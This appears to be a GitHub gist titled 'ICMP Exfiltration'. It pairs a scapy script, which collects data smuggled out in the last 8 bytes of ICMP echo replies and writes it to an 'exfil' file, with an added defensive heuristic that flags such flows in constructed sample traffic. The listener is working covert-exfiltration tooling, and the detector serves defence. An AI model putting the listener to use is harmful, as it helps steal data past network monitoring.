@outhex
Forked from maxrodrigo/icmp_exfiltration.py
Created September 29, 2021 00:41
ICMP Exfiltration
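#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP


def process_packet(packet):
    # Only ICMP echo replies (type 0) are inspected.
    if packet.haslayer(ICMP) and packet[ICMP].type == 0:
        # Keep the last 8 bytes of the ICMP payload.
        data = packet[ICMP].load[-8:]
        try:
            print(f"{data.decode('utf-8')}", end="")
        except UnicodeDecodeError:
            pass
        # Append the raw bytes to ./exfil whether or not they decoded as UTF-8.
        with open("./exfil", "a+b") as f:
            f.write(data)


if __name__ == "__main__":
    # The interface name is specific to the machine the script runs on.
    sniff(iface="wlp3s0", prn=process_packet)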
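
A defender-side counterpart to the listener above, added here as an example and not part of the gist: it groups ICMP payloads by flow and flags flows whose last 8 bytes change from packet to packet, which is the region this script reads. The function names, thresholds and sample records are assumptions constructed for illustration, and the payloads are assumed to have been extracted from a capture already.

```python
from collections import defaultdict

TAIL_LEN = 8  # the listener above keeps only the last 8 payload bytes


def flag_varying_tails(records, min_packets=4, min_distinct_ratio=0.75):
    """records: iterable of (src, dst, payload_bytes) taken from ICMP echo traffic.

    Returns the sorted (src, dst) flows whose payload tails keep changing.
    Thresholds are assumed starting points, not tuned values.
    """
    tails = defaultdict(list)
    for src, dst, payload in records:
        if len(payload) >= TAIL_LEN:  # shorter payloads cannot carry a full tail
            tails[(src, dst)].append(payload[-TAIL_LEN:])

    flagged = []
    for flow, seen in tails.items():
        if len(seen) < min_packets:
            continue  # too few packets to judge
        # Fixed padding gives one distinct tail; carried data gives many.
        if len(set(seen)) / len(seen) >= min_distinct_ratio:
            flagged.append(flow)
    return sorted(flagged)


def constructed_sample():
    """Constructed records (not captured traffic); addresses are documentation ranges."""
    fixed_pad = bytes(range(0x10, 0x38))  # 40 bytes of constant padding
    benign = [("192.0.2.10", "198.51.100.5", i.to_bytes(8, "big") + fixed_pad)
              for i in range(6)]  # varying 8-byte prefix, constant tail
    text = b"constructed sample text, 8 bytes per packet....."
    chunks = [text[i:i + TAIL_LEN] for i in range(0, len(text), TAIL_LEN)]
    odd = [("192.0.2.77", "203.0.113.9", bytes(48) + c) for c in chunks]
    short = [("192.0.2.10", "198.51.100.5", b"abc")]  # ignored: under 8 bytes
    return benign + odd + short


if __name__ == "__main__":
    for src, dst in flag_varying_tails(constructed_sample()):
        print(f"review ICMP flow {src} -> {dst}: payload tail changes packet to packet")
```

Payload generators that place a counter or timestamp at the end of the payload will also trip this heuristic, so a hit marks a flow to inspect rather than a verdict.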